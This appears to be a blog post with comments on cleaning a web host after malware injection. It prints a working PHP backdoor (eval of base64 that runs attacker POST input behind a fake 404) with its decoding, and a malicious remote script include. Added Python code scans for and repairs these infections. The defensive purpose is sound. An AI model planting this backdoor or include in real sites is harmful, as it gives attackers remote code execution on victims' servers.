It has been a while since the last attack on my server by the iframe virus. Today I got another kind of attack, but this time it is more about JavaScript (.js) files (and, as the symptoms below show, PHP and HTML files too) that carry code hidden inside base64_decode() calls.
You will know that your website or server has been attacked by a hacker or virus if you see the following symptoms :-
1) gifimg.php files being created in the "image" folder of the affected account.
Inside the file is the following code :-
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
The base64 string decodes to
if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');
which is a backdoor: it runs whatever PHP code the attacker sends in the POST parameter "e", and answers a fake "404 Not Found" to anyone else, so a casual visit to the file does not reveal it.
2) A few affected files have encoded code injected at the beginning of the file, e.g. index.php :-
< ? php eval(base64_decode('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'));
3) Some affected index.html/index.htm/index.php files were injected with a remote script include like the one below (the redirect address may vary) :-
<script src="http://amusecity.com/ii/smple.php"></script>
4) If you use any contact form script on your server, you will get an email alert from your hosting control panel reporting that spam may be sent from your account. The alert lists recently uploaded scripts that contain mail-sending code, e.g. :-
Below are the recently upload scripts that contain code to send email. You may wish to inspect them to ensure they are not sending out SPAM.
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:195: $fullmsg .= "----------------------------------------------------------------------------\n";
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:196: mail($email, $subject ." ". $subj_suffix, $fullmsg, $headers);
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:197: } else {
---
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:206: $fullmsg .= "----------------------------------------------------------------------------\n";
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:207: mail($recipient, $subject ." ". $subj_suffix, $fullmsg, $headers);
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:208: }
---
/home/kxxxx/public_html/wp-includes/pluggable.php:379:
/home/kxxxx/public_html/wp-includes/pluggable.php:380: // Set to use PHP's mail()
/home/kxxxx/public_html/wp-includes/pluggable.php:381: $phpmailer->IsMail();
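The four symptoms above can be checked mechanically. The scanner below is an added example written for this page, not code from the original post: it looks for the eval(base64_decode('...')) stanza, decodes the blob and classifies it (a payload that reads $_POST/$_GET and evals it is the remote-command backdoor from symptom 1), flags remote <script src=...> includes pointing at hosts you do not trust, and flags the gifimg.php file name. The sample files are constructed; the gifimg.php blob and the amusecity.com URL are the ones quoted above, the index.php blob and the evil.example host are made up for the example.

```python
import base64
import os
import re

# Indicators described in the post: an eval(base64_decode('...')) stanza, a remote
# <script src=...> include, and the gifimg.php dropper file name.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
SCRIPT_SRC_RE = re.compile(
    r"<\s*script[^>]*\bsrc\s*=\s*[\"']?\s*(https?://[^\s\"'>]+)", re.IGNORECASE
)
# A decoded payload that reads request input and evals it is a remote-command backdoor.
INPUT_MARKERS = ("$_POST", "$_GET", "$_REQUEST", "$_COOKIE")
SCAN_EXTS = (".php", ".html", ".htm", ".js")


def decode_payload(b64: str) -> str:
    """Decode a base64 blob to text; returns '' if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def scan_content(path: str, content: str, trusted_hosts=()) -> list:
    """Return one finding per indicator present in `content` (a text file body)."""
    findings = []
    for m in EVAL_B64_RE.finditer(content):
        payload = decode_payload(m.group(1))
        if "eval" in payload and any(k in payload for k in INPUT_MARKERS):
            kind = "eval backdoor (executes attacker-supplied code)"
        elif SCRIPT_SRC_RE.search(payload):
            kind = "obfuscated remote include"
        else:
            kind = "obfuscated eval"
        findings.append({"path": path, "kind": kind, "offset": m.start(), "payload": payload})
    for m in SCRIPT_SRC_RE.finditer(content):
        url = m.group(1)
        if url.split("/")[2].lower() not in trusted_hosts:
            findings.append({"path": path, "kind": "remote script include",
                             "offset": m.start(), "payload": url})
    if os.path.basename(path) == "gifimg.php":
        findings.append({"path": path, "kind": "known dropper file name", "offset": 0, "payload": ""})
    return findings


def scan_tree(root: str, trusted_hosts=()) -> list:
    """Walk a web root (e.g. public_html) and scan every .php/.html/.htm/.js file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXTS):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_content(os.path.relpath(full, root), fh.read(), trusted_hosts))
    return findings


# Constructed sample files standing in for a hosting account. The gifimg.php blob and the
# amusecity.com URL are the ones quoted in the post; the index.php blob is made up here.
CONSTRUCTED_B64 = base64.b64encode(
    b"echo '<script src=\"http://evil.example/x.js\"></script>';").decode()
SAMPLES = {
    "images/gifimg.php": "<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>",
    "index.php": "<?php eval(base64_decode('" + CONSTRUCTED_B64 + "'));?><?php\nrequire 'wp-blog-header.php';\n",
    "index.html": "<html><body>\n<script src=\"http://amusecity.com/ii/smple.php\"></script>\n</body></html>\n",
    "js/gallery.js": "function show(i) { /* untouched gallery code */ }\n",
}

if __name__ == "__main__":
    # On a real account: scan_tree("/home/ACCOUNT/public_html", trusted_hosts=("ajax.googleapis.com",))
    for path, content in SAMPLES.items():
        for f in scan_content(path, content):
            print(f"{f['path']}: {f['kind']} at byte {f['offset']}: {f['payload'][:70]}")
```

Decoding the blob before judging it matters: the same eval(base64_decode(...)) wrapper hides both a harmless-looking redirect and a full command backdoor, and only the latter means the attacker can still run code after you delete the injected lines.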
So what is the best solution for such an attack?
1) First, repair all the affected files from unaffected/original/backup copies. You can find them by looking at the file details (last created/modified time): usually the most recently created or modified files are the affected ones (view each file's code to confirm, and do not rely on timestamps alone, since an attacker can reset them).
Make sure you scan your backup files with an up-to-date antivirus before restoring (Avast is recommended as an iframe remover).
2) Once all the files have been restored, temporarily disable FTP on your server.
3) Then change all your account/server/FTP passwords to strong new ones. (Plain FTP sends the password in clear text; if your host offers SFTP or FTPS, switch to that.)
4) When you need to upload, enable the FTP server again, limit it to one connection per session and disable FTP monitoring as well.
5) Disable the FTP server afterwards, and only enable it while you are actually using FTP from your end.
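Step 1 above, comparing the live site against a known-clean backup and restoring only what is provably injected, as an added example written for this page (my code, not from the post). It assumes the backup tree mirrors the live tree's layout and that injected PHP files carry the eval(base64_decode( stanza as a prefix in front of the otherwise untouched original, as the index.php sample above shows. Files that differ in any other way are listed for manual review rather than overwritten, since a legitimate edit made after the backup looks the same as tampering to a hash comparison. The sample trees are constructed.

```python
import hashlib
import os
import shutil
import sys

# Prefix the post shows prepended to infected PHP files (the base64 blob differs per file).
INJECT_START = b"<?php eval(base64_decode("


def load_tree(root: str) -> dict:
    """Read every file under root into {relative POSIX path: bytes}."""
    tree = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                tree[os.path.relpath(full, root).replace(os.sep, "/")] = fh.read()
    return tree


def classify(live: dict, backup: dict) -> dict:
    """Compare a live tree with a known-clean backup (both {path: bytes}).

    Verdicts: 'clean' (identical), 'prepended' (live is exactly an injected
    eval(base64_decode(...)) prefix followed by the backup copy), 'modified'
    (differs some other way; inspect by hand), 'unexpected' (only on the live
    site, like the gifimg.php dropper), 'missing' (only in the backup).
    """
    verdicts = {}
    for path in sorted(set(live) | set(backup)):
        if path not in backup:
            verdicts[path] = "unexpected"
        elif path not in live:
            verdicts[path] = "missing"
        elif hashlib.sha256(live[path]).digest() == hashlib.sha256(backup[path]).digest():
            verdicts[path] = "clean"
        else:
            extra = live[path][: len(live[path]) - len(backup[path])]
            injected = live[path].endswith(backup[path]) and extra.startswith(INJECT_START)
            verdicts[path] = "prepended" if injected else "modified"
    return verdicts


ACTIONS = {"prepended": "restore", "unexpected": "quarantine", "modified": "review", "missing": "review"}


def plan_repair(verdicts: dict) -> list:
    """Only provably-injected files are touched automatically; the rest is listed for review."""
    return [(ACTIONS[v], p) for p, v in sorted(verdicts.items()) if v != "clean"]


def apply_repair(plan: list, live_root: str, backup_root: str, quarantine_root: str) -> None:
    """Restore 'restore' entries from the backup and move 'quarantine' entries out of the web root."""
    for action, path in plan:
        live_path = os.path.join(live_root, path)
        if action == "restore":
            shutil.copy2(os.path.join(backup_root, path), live_path)
        elif action == "quarantine":
            dst = os.path.join(quarantine_root, path)
            os.makedirs(os.path.dirname(dst), exist_ok=True)
            shutil.move(live_path, dst)
        else:
            print(f"review by hand: {path}")


# Constructed sample trees (not from a real server); 'Y29uc3RydWN0ZWQ=' is just base64 of 'constructed'.
CLEAN_INDEX = b"<?php\nrequire 'wp-blog-header.php';\n"
LIVE = {
    "index.php": b"<?php eval(base64_decode('Y29uc3RydWN0ZWQ='));?>" + CLEAN_INDEX,
    "images/gifimg.php": b"<?php eval(base64_decode('...'));?>",
    "about.php": b"<?php echo 'about page, edited by the owner after the backup';\n",
    "wp-config.php": b"<?php define('DB_NAME', 'site');\n",
}
BACKUP = {
    "index.php": CLEAN_INDEX,
    "about.php": b"<?php echo 'about page';\n",
    "wp-config.php": b"<?php define('DB_NAME', 'site');\n",
    "js/gallery.js": b"function show(i) {}\n",
}

if __name__ == "__main__":
    if len(sys.argv) == 4:  # usage: repair.py LIVE_ROOT BACKUP_ROOT QUARANTINE_DIR
        live_root, backup_root, quarantine = sys.argv[1:]
        plan = plan_repair(classify(load_tree(live_root), load_tree(backup_root)))
        apply_repair(plan, live_root, backup_root, quarantine)
    else:
        for action, path in plan_repair(classify(LIVE, BACKUP)):
            print(f"{action:10s} {path}")
```

Quarantining rather than deleting the unexpected files keeps the dropper and any other attacker artefacts available for a later look at what else was done with the stolen credentials.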
That's all.
Good luck!
Scammer Alert team.


Dear Team,
I have more than 500 websites on my server. I have been doing these steps for the last few months, since the day the iframe infected a few sites; we cleaned them, even restored from backup files and uploaded the files too.
But it comes back on other sites, or most often on the same site.
What do I need to do about this?
Regards,
Umer
Hi Umer,
Did you disable the FTP service after you restored all your sites with the clean files?
You could enable the FTP service, set to only one connection per session, only whenever you want to use it.
It seems that the source of the problem is a virus infecting the computer that is used to upload files: it steals your FTP password and sends it off to the hackers.
Start by scanning for and removing any viruses at the PC end, and once that's cleaned up, change the FTP passwords and delete the extraneous script-kiddie debris. Make sure you get all of them!
Thanks for the tips Tom, much appreciated.
Thanks for the great article. I've got the same problem with some galleries I have on my website. Every day my files get changed and the base64_decode gets added to a couple of files. Because of this, the galleries don't work anymore. Every day I change the files manually (I have a backup on my computer and just replace them; after this, everything works fine).
I've checked my computer for spyware and viruses, but found nothing. Unfortunately I don't have access to the whole server (so I can't disable server FTP). But I had always saved my passwords. Now I have disabled this and changed the passwords. I hope everything works from now on.
Do you think it has something to do with my FTP software (CoreFTP) or is it just a server problem?
Nice to see you posting on this topic, I have to bookmark this website. Keep up the good work.
Thanks for the suggestion.
Great article; unfortunately I discovered it after I had solved the problem.
Could you please tell us the name of the Trojan that appears in the photo of your AV software, or the name of the Trojan that steals FTP passwords?
Thank you.
Just cleaned up the same issue on my website. Y'all might want to keep a lookout for files that have:
1. the added PHP tag (in PHP files)
2. gifimg.php
3. JS files with added tags
4. HTML files with an added URL (to the spam site)
The above were the files I cleaned up. Other steps I took were the ones mentioned above: limit FTP (unfortunately, I can't disable mine completely), change passwords, etc.
I have no Trojans on my PC, though; it has Avast running 24/7 with intermittent random (other) scans.
BTW, this site is still marked as a malware site by Google. You might want to take it up with them, or re-scan your site. =)
Hi,
Thanks for the bump and for the alert about the site being marked as malware by Google.
I've added the site to Google Webmaster Tools, verified the site, submitted a sitemap, and run the Diagnostics tool, and found no malware ("Google has not detected any malware on this site.").
Spyware and viruses really do give me one heck of a headache.